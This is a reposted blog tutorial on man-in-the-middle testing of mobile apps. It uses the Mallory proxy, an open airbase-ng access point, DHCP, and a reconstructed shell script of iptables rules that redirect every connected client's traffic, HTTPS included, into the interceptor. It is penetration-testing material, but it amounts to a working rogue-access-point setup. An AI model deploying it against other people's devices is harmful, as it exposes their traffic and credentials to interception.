Thanks to Tom Neaves (@tomneaves) for putting this guide back up on his blog after a brief downtime. I found this really useful when I was doing mobile application testing (with hostapd being a bitch and not working except with specific versions of chipsets). We're placing the tutorial here on our site so that others who are looking for it have more than one place to go to, but all credit for writing this and coming up with it goes to Tom. Here you go, and happy mobile app hacking!
The original article is here: http://blog.tomneaves.com/post/3523418896/using-mallory-and-airbase-ng-to-mitm-mobile
————————————————————————————–
I first found out about Mallory at the OWASP 2011 Summit in Portugal earlier this month. I was speaking to Mike Zusman (@schmoilito) of the Intrepidus Group who mentioned it to me. Mallory is a transparent TCP and UDP proxy which can be used to intercept network streams and is especially useful for blackbox network analysis of mobile applications. Previously I had used Charles for OS X to analyse and mess with mobile applications running inside the iOS Simulator from a whitebox perspective.
I booted up Ubuntu and eagerly followed the step-by-step instructions for installing Mallory. However, I was soon stumped when I saw that hostapd was being mentioned (Step Two). I have a history with hostapd; it has stolen many hours of my life. Anyway, they use hostapd in their example to set up a soft access point. The HostAP driver supports Prism chipset cards only, meaning my Intel 4965 (iwlagn) was out of luck. Painful. However, I was pretty sure I could deviate from their instructions and use airbase-ng instead. I skipped the whole of “Step Two”, installed Mallory (Step Three) and then modified “Step Four” a little, namely not using dnsmasq and making the airbase-ng changes.
Rather than confusing you completely and having you swap between their instructions and mine, I will list them all here.
I am using an HP EliteBook 6930p running Ubuntu 10.10, but you must use a slightly older kernel: 2.6.32-25-generic-pae. I found out that airbase-ng has a nasty bug with the Intel cards on the most recent kernel that leaves the interface locked to channel “255”. Again, this bug has claimed minutes of my life that I will never get back, so trust me on this one! I believe you can patch the drivers or something but let’s not go there for now.
I have the laptop connected to my local network via Ethernet (eth0) gaining an IP address via DHCP. The wireless interface (wlan0) is up but not associated with any wireless networks.
We first want to install all the dependencies that Mallory needs, and there’s a load of ‘em!
sudo apt-get install mercurial python-pyasn1 python-netfilter libnetfilter-conntrack-dev python2.6-dev python-setuptools netfilter-extensions-source libnetfilter-conntrack3-dbg python-paramiko python-imaging
sudo easy_install pynetfilter_conntrack
If you are installing on a 32 bit system then you’ll need to do the following:
wget http://ubuntu.cs.utah.edu/ubuntu/pool/universe/libn/libnetfilter-conntrack/libnetfilter-conntrack1_0.0.99-1_i386.deb
sudo dpkg -i libnetfilter-conntrack1_0.0.99-1_i386.deb
For a 64 bit system grab this instead:
wget http://ubuntu.cs.utah.edu/ubuntu/pool/universe/libn/libnetfilter-conntrack/libnetfilter-conntrack1_0.0.99-1_amd64.deb
sudo dpkg -i libnetfilter-conntrack1_0.0.99-1_amd64.deb
Now is a good time to install the aircrack-ng suite of tools if you don’t already have ‘em. Also, we will want to install dhcp3-server to handle wireless clients.
sudo apt-get install aircrack-ng dhcp3-server
Let’s grab Mallory:
hg clone http://bitbucket.org/IntrepidusGroup/mallory
The last thing we really need to configure is the dhcpd.conf file that dhcp3-server will use to give out IP addresses to our wireless clients. You can download one that I have already prepared for you here. You need to put this in /etc/dhcp3/ and only change one thing: the domain-name-servers bit, to reflect your LAN’s DNS server. In the sample dhcpd.conf this is 192.168.1.254. Change this to what yours is. If you don’t know, have a look at /etc/resolv.conf; it will probably be in there if you got your IP via DHCP. Once changed, save and exit.
option domain-name-servers 192.168.1.254;
Now we are ready to rock and roll.
As stated previously, my laptop is plugged into my local network via Ethernet (eth0) and the wireless interface (wlan0) is up but not associated to anything. My laptop’s DNS server is 192.168.1.254 (which is reflected in the dhcpd.conf file we hacked up). All that’s left are a few more manual steps and running another script that I prepared earlier. You will need to be root to do all of this goodness.
Download a script I created (rah.sh) that automates a load of the painful bits prior to starting up Mallory – don’t run it yet though! We will still need to do a couple of things manually but this will save you some time. Nearly there, don’t worry!
We are all dressed up and ready for the ball. You won’t need to do the previous steps again every time you want to run Mallory. From here on in it’s rinse and repeat.
We want to kill the network-manager as it can be a bugger. We also want to bring up the Ethernet interface if we haven’t done so already and grab an IP address.
stop network-manager
ifconfig eth0 up
dhclient eth0
We want to bring up our wireless interface (if it wasn’t already) and whack it into monitor mode.
ifconfig wlan0 up
airmon-ng start wlan0
This will create a virtual interface mon0. We will use this to create our soft access point and to ultimately create a TAP interface called at0. The command below will create a completely open access point with the SSID of “rah” on channel 6.
airbase-ng -e rah -c 6 -v mon0
You will need to open another terminal window now, as airbase-ng will stay in the foreground. In the new terminal window execute the rah.sh script you downloaded. You may need to chmod this bad boy if the permissions give you grief.
chmod +x rah.sh
./rah.sh
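The rah.sh link above is not reproduced on this page, so here is a reconstruction of the plumbing that script has to do between airbase-ng creating at0 and Mallory starting: give at0 an address, turn on IP forwarding, NAT out of eth0, redirect every TCP and UDP connection arriving on at0 into Mallory, write the dhcpd.conf from the earlier step, and restart dhcp3-server on at0. This is an added example, not Tom’s script and not code from the Mallory repository. Everything in it is an assumption the post does not state: at0 is given 10.0.0.1/24 with clients leased 10.0.0.100–200, the upstream DNS is 192.168.1.254 as in the post’s dhcpd.conf, and Mallory is assumed to listen on port 20755 (check the Mallory configuration if yours differs). With no argument it only prints the commands; run it as root with “apply” once airbase-ng is up, and “verify” afterwards.

```sh
#!/bin/sh
# Reconstruction of what rah.sh has to do once airbase-ng has created at0.
# Added example, not the original script. Everything below is an assumption
# not stated in the post: at0 gets 10.0.0.1/24, clients are leased
# 10.0.0.100-200, and Mallory listens on TCP and UDP port 20755.
AP_IF=${AP_IF:-at0}            # TAP interface airbase-ng creates
UP_IF=${UP_IF:-eth0}           # upstream interface with the real LAN
AP_ADDR=${AP_ADDR:-10.0.0.1}
AP_NET=${AP_NET:-10.0.0.0}
AP_MASK=${AP_MASK:-255.255.255.0}
DNS=${DNS:-192.168.1.254}      # your LAN resolver, as in the post's dhcpd.conf
MALLORY_PORT=${MALLORY_PORT:-20755}   # assumed Mallory listener port

# dhcpd.conf for dhcp3-server: just the one subnet hung off at0.
rah_dhcpd_conf() {
  cat <<EOF
ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet $AP_NET netmask $AP_MASK {
  range ${AP_NET%.*}.100 ${AP_NET%.*}.200;
  option routers $AP_ADDR;
  option subnet-mask $AP_MASK;
  option domain-name-servers $DNS;
}
EOF
}

# The plumbing, printed as commands so you can read it before it runs.
# Only traffic arriving on at0 is redirected; the laptop's own eth0 traffic
# never touches Mallory. DHCP (udp/67) is exempted so leases keep working.
# Note that "iptables -t nat -F" wipes any NAT rules you already had.
rah_commands() {
  cat <<EOF
ifconfig $AP_IF $AP_ADDR netmask $AP_MASK up
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -F
iptables -t nat -A PREROUTING -i $AP_IF -p udp --dport 67 -j ACCEPT
iptables -t nat -A PREROUTING -i $AP_IF -p tcp -j REDIRECT --to-ports $MALLORY_PORT
iptables -t nat -A PREROUTING -i $AP_IF -p udp -j REDIRECT --to-ports $MALLORY_PORT
iptables -t nat -A POSTROUTING -o $UP_IF -j MASQUERADE
EOF
}

# Apply it all as root. Refuses to run if at0 does not exist yet, which
# means airbase-ng is not running in the other terminal.
rah_apply() {
  [ "$(id -u)" -eq 0 ] || { echo "rah_apply: run as root" >&2; return 1; }
  ifconfig "$AP_IF" >/dev/null 2>&1 \
    || { echo "rah_apply: no $AP_IF; is airbase-ng running?" >&2; return 1; }
  rah_dhcpd_conf > /etc/dhcp3/dhcpd.conf
  sed -i "s/^INTERFACES=.*/INTERFACES=\"$AP_IF\"/" /etc/default/dhcp3-server
  rah_commands | sh -e
  /etc/init.d/dhcp3-server restart
}

# Quick check that forwarding is on and the REDIRECT rules are in place.
rah_verify() {
  [ "$(cat /proc/sys/net/ipv4/ip_forward)" = 1 ] \
    || { echo "ip_forward is off" >&2; return 1; }
  iptables -t nat -L PREROUTING -n | grep -q "ports $MALLORY_PORT" \
    || { echo "no REDIRECT to $MALLORY_PORT on $AP_IF" >&2; return 1; }
  echo "ok: $AP_IF -> Mallory on port $MALLORY_PORT, upstream via $UP_IF"
}

case "${1:-}" in
  apply)  rah_apply ;;
  verify) rah_verify ;;
  conf)   rah_dhcpd_conf ;;
  *)      rah_commands ;;      # default: dry run, just print the commands
esac
```

The REDIRECT rules are restricted to packets coming in on at0 on purpose: without the -i match, the laptop’s own outbound connections would also be pulled into Mallory. The dhcpd.conf it writes replaces whatever is in /etc/dhcp3/dhcpd.conf, so keep a copy if you have one you care about.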
Time to run Mallory!
Mallory has two components: a console and a GUI. This isn’t entirely obvious (or wasn’t to me at least) the first time I started playing about. We will start the Mallory debug console in the foreground in one terminal window, then open another and start the GUI. You will need to be root to do this.
cd /mallory/src/
python mallory.py
Then, in the second terminal window:
cd /mallory/src/
python launchgui.py
The GUI will pop up. Click on the “Streams” tab and then click the “Intercept” and “Auto Send” buttons in. This tells the console to send all traffic to the GUI for you to fiddle with. Now go get your iPhone or other mobile device, have it join the “rah” wireless network and have some fun. A side note here: you probably want to keep the RF signal on the low side, as “rah” is an open access point and anyone who joins it is bridged out onto the Internet through your computer and through Mallory. I wouldn’t recommend setting this up in a Starbucks unless you’re that way inclined.
Running Mallory with the default options will flip all the images the iPhone loads upside down so you will know you’re correctly doing a MiTM attack. If you want to intercept HTTPS then you need to start the Mallory console with the following parameters:
python mallory.py -p sslproto.SSLProtocol
Then, in the second terminal window:
python launchgui.py
Click on the “Streams” tab again and click the “Intercept” and “Auto Send” buttons in. In no time you’ll see the window on the left start scrolling with the HTTPS connection. Obviously you’ll have to click through the certificate warnings on your mobile phone. Bear in mind that only software which actually prompts (the browser, mostly) will give you that choice; an app that pins its certificate, or simply refuses an untrusted one, will just fail to connect and nothing will appear in Mallory for it.
The guys at Intrepidus Group did a presentation at Black Hat USA 2010 which is on YouTube in 5 parts. That will give you a good idea of all the funky stuff you can do. I didn’t want this post to be a complete tutorial or to take anything away / repeat anything the guys at Intrepidus Group have done. Check out their blog which has the more complex features of Mallory documented, such as having Mallory carry out SSL MiTM on a non-standard port.
Hopefully this blog post has taken some of the pain away in setting up Mallory when you don’t have a Prism wireless card. I haven’t long been playing with Mallory myself but please hit me up if you run into problems and I’ll try to help.
Lastly, I’d like to thank the Intrepidus Group guys for creating a cool tool (especially with the extendable plug-in functionality) and sharing with the community.